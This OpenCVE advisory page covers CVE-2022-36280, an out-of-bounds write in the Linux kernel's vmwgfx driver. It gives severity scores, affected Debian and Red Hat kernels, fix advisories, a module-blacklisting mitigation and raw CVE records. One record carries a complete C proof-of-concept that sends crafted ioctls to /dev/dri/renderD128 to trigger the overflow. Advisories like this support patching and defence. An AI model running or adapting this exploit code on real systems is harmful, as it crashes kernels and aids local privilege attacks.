CVE-2022-36280 - Vulnerability Details - OpenCVE

An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).

No CVSS v4.0

Attack Vector Network

Attack Complexity Low

Privileges Required Low

Scope Unchanged

Confidentiality Impact None

Integrity Impact Low

Availability Impact High

User Interaction Required

No CVSS v3.0

No CVSS v2

This CVE is not in the KEV list.

The EPSS score is 0.00032.

Key SSVC decision points have not yet been added.

Vendors	Products
Debian	Debian Linux
Linux	Linux Kernel
Redhat	Enterprise Linux

Configuration 1 [-]

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*

Configuration 2 [-]

cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*

Package	CPE	Advisory	Released Date
Red Hat Enterprise Linux 9
kernel-0:5.14.0-284.11.1.el9_2	cpe:/a:redhat:enterprise_linux:9	RHSA-2023:2458	2023-05-09T00:00:00Z
kernel-rt-0:5.14.0-284.11.1.rt14.296.el9_2	cpe:/a:redhat:enterprise_linux:9::nfv	RHSA-2023:2148	2023-05-09T00:00:00Z
kernel-0:5.14.0-284.11.1.el9_2	cpe:/o:redhat:enterprise_linux:9	RHSA-2023:2458	2023-05-09T00:00:00Z

No data.

Fixes

Solution

No solution given by the vendor.

Workaround

No workaround given by the vendor.

References

Link	Providers
https://bugzilla.openanolis.cn/show_bug.cgi?id=2071
https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html
https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html
https://nvd.nist.gov/vuln/detail/CVE-2022-36280
https://www.cve.org/CVERecord?id=CVE-2022-36280
https://www.debian.org/security/2023/dsa-5324

History

No history.

MITRE

Status: PUBLISHED

Assigner: Anolis

Published: 2022-09-09T14:39:50.986805Z

Updated: 2024-09-17T00:01:20.651Z

Reserved: 2022-09-07T00:00:00

Link: CVE-2022-36280

Vulnrichment

No data.

NVD

Status : Modified

Published: 2022-09-09T15:15:10.497

Modified: 2024-11-21T07:12:42.790

Link: CVE-2022-36280

Redhat

Severity : Moderate

Publid Date: 2022-09-09T00:00:00Z

Links: CVE-2022-36280 - Bugzilla

OpenCVE Enrichment

No data.

{"dataType": "CVE_RECORD", "dataVersion": "5.1", "cveMetadata": {"state": "PUBLISHED", "cveId": "CVE-2022-36280", "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "assignerShortName": "Anolis", "dateUpdated": "2024-09-17T00:01:20.651Z", "dateReserved": "2022-09-07T00:00:00", "datePublished": "2022-09-09T14:39:50.986805Z"}, "containers": {"cna": {"title": "There is an out-of-bounds write vulnerability in vmwgfx driver", "datePublic": "2022-09-06T00:00:00", "providerMetadata": {"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "shortName": "Anolis", "dateUpdated": "2023-05-03T00:00:00"}, "descriptions": [{"lang": "en", "value": "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."}], "affected": [{"vendor": "Linux", "product": "kernel", "versions": [{"version": "v3.2-rc1", "status": "affected", "lessThan": "5.13.0-52*", "versionType": "custom"}]}], "references": [{"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071"}, {"name": "DSA-5324", "tags": ["vendor-advisory"], "url": "https://www.debian.org/security/2023/dsa-5324"}, {"name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": ["mailing-list"], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"}, {"name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": ["mailing-list"], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"}], "credits": [{"lang": "en", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"}], "metrics": [{"cvssV3_1": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM"}}], "problemTypes": [{"descriptions": [{"type": "CWE", "lang": "en", "description": "CWE-120 Buffer Overflow", "cweId": "CWE-120"}]}], "x_generator": {"engine": "Vulnogram 0.0.9"}, "source": {"defect": ["https://bugzilla.openanolis.cn/show_bug.cgi?id=2071"], "discovery": "INTERNAL"}, "exploits": [{"lang": "en", "value": "#include <stdio.h>\n#include <string.h>\n#include <unistd.h>\n#include <errno.h>\n\n#include <linux/if_tun.h>\n#include <net/if.h>\n#include <sys/ioctl.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <pthread.h>\n#include <sys/socket.h>\n#include <string.h>\n#include <unistd.h>\n#include <stdlib.h>\n#include <sys/ioctl.h>\n#include <errno.h>\n#include <stdio.h>\n#include <fcntl.h>\n#include <pthread.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <stdint.h>\n#include <netinet/ip.h>\n#include <sys/resource.h>\n#include <sys/syscall.h>\n#include <limits.h>\n#include <sys/mman.h>\n\n#include <linux/fs.h>\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int handle,int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n 0x2000,\n PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n strerror(errno));\n }\n \n memset(vaddr,\"a\",0x2000); \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0x2000;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1; \n if (ioctl(fd, 0x4028644C, &arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, &arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, &arg) == -1)\n {\n printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint handle=alloc_bo();\n int sid = create_surface(); \n printf(\"%d\",sid); \n poc(handle,sid); \n \n}"}]}, "adp": [{"providerMetadata": {"orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE", "dateUpdated": "2024-08-03T10:00:04.335Z"}, "title": "CVE Program Container", "references": [{"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071", "tags": ["x_transferred"]}, {"name": "DSA-5324", "tags": ["vendor-advisory", "x_transferred"], "url": "https://www.debian.org/security/2023/dsa-5324"}, {"name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update", "tags": ["mailing-list", "x_transferred"], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"}, {"name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": ["mailing-list", "x_transferred"], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"}]}]}}

{"configurations": [{"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "matchCriteriaId": "852C22EB-3886-4224-9D6F-3A0C2CAB8667", "versionEndIncluding": "5.13.0-52", "versionStartIncluding": "3.2", "vulnerable": true}], "negate": false, "operator": "OR"}]}, {"nodes": [{"cpeMatch": [{"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "vulnerable": true}], "negate": false, "operator": "OR"}]}], "descriptions": [{"lang": "en", "value": "An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad de acceso a memoria fuera de l\u00edmites (OOB) en el controlador vmwgfx en el archivo drivers/gpu/vmxgfx/vmxgfx_kms.c en el componente GPU en el kernel de Linux con el archivo de dispositivo \"/dev/dri/renderD128 (o Dxxx)\". Este fallo permite a un atacante local con una cuenta de usuario en el sistema conseguir privilegios, causando una denegaci\u00f3n de servicio(DoS)"}], "id": "CVE-2022-36280", "lastModified": "2024-11-21T07:12:42.790", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1"}, "exploitabilityScore": 2.1, "impactScore": 4.2, "source": "security@openanolis.org", "type": "Secondary"}, {"cvssData": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary"}]}, "published": "2022-09-09T15:15:10.497", "references": [{"source": "security@openanolis.org", "tags": ["Issue Tracking", "Permissions Required", "Third Party Advisory"], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071"}, {"source": "security@openanolis.org", "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"}, {"source": "security@openanolis.org", "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"}, {"source": "security@openanolis.org", "tags": ["Third Party Advisory"], "url": "https://www.debian.org/security/2023/dsa-5324"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Issue Tracking", "Permissions Required", "Third Party Advisory"], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"}, {"source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Third Party Advisory"], "url": "https://www.debian.org/security/2023/dsa-5324"}], "sourceIdentifier": "security@openanolis.org", "vulnStatus": "Modified", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-120"}], "source": "security@openanolis.org", "type": "Secondary"}, {"description": [{"lang": "en", "value": "CWE-787"}], "source": "nvd@nist.gov", "type": "Primary"}]}

{"affected_release": [{"advisory": "RHSA-2023:2458", "cpe": "cpe:/a:redhat:enterprise_linux:9", "package": "kernel-0:5.14.0-284.11.1.el9_2", "product_name": "Red Hat Enterprise Linux 9", "release_date": "2023-05-09T00:00:00Z"}, {"advisory": "RHSA-2023:2148", "cpe": "cpe:/a:redhat:enterprise_linux:9::nfv", "package": "kernel-rt-0:5.14.0-284.11.1.rt14.296.el9_2", "product_name": "Red Hat Enterprise Linux 9", "release_date": "2023-05-09T00:00:00Z"}, {"advisory": "RHSA-2023:2458", "cpe": "cpe:/o:redhat:enterprise_linux:9", "package": "kernel-0:5.14.0-284.11.1.el9_2", "product_name": "Red Hat Enterprise Linux 9", "release_date": "2023-05-09T00:00:00Z"}], "bugzilla": {"description": "kernel: vmwgfx: out-of-bounds write in vmw_kms_cursor_snoop", "id": "2133450", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133450"}, "csaw": false, "cvss3": {"cvss3_base_score": "5.5", "cvss3_scoring_vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "status": "verified"}, "cwe": "CWE-120->CWE-787", "details": ["An out-of-bounds(OOB) memory access vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_kms.c in GPU component in the Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).", "An out-of-bounds memory write vulnerability was found in the Linux kernel's vmwgfx driver in vmw_kms_cursor_snoop due to a missing check of a memcpy length. This flaw allows a local, unprivileged attacker with access to either the /dev/dri/card0 or /dev/dri/rendererD128 and able to issue an ioctl() on the resulting file descriptor, to crash the system, causing a denial of service."], "mitigation": {"lang": "en:us", "value": "To mitigate this issue, it is possible to prevent the affected code from being loaded by blacklisting the vmwgfx kernel module. For instructions relating to blacklisting a kernel module, please see https://access.redhat.com/solutions/41278."}, "name": "CVE-2022-36280", "package_state": [{"cpe": "cpe:/o:redhat:enterprise_linux:6", "fix_state": "Out of support scope", "package_name": "kernel", "product_name": "Red Hat Enterprise Linux 6"}, {"cpe": "cpe:/o:redhat:enterprise_linux:7", "fix_state": "Out of support scope", "package_name": "kernel", "product_name": "Red Hat Enterprise Linux 7"}, {"cpe": "cpe:/o:redhat:enterprise_linux:7", "fix_state": "Out of support scope", "package_name": "kernel-rt", "product_name": "Red Hat Enterprise Linux 7"}, {"cpe": "cpe:/o:redhat:enterprise_linux:8", "fix_state": "Affected", "package_name": "kernel", "product_name": "Red Hat Enterprise Linux 8"}, {"cpe": "cpe:/o:redhat:enterprise_linux:8", "fix_state": "Affected", "package_name": "kernel-rt", "product_name": "Red Hat Enterprise Linux 8"}], "public_date": "2022-09-09T00:00:00Z", "references": ["https://www.cve.org/CVERecord?id=CVE-2022-36280\nhttps://nvd.nist.gov/vuln/detail/CVE-2022-36280"], "statement": "Systems making use of the vmwgfx driver are potentially affected by this flaw; systems without the vmwgfx driver loaded are not affected by this flaw.", "threat_severity": "Moderate"}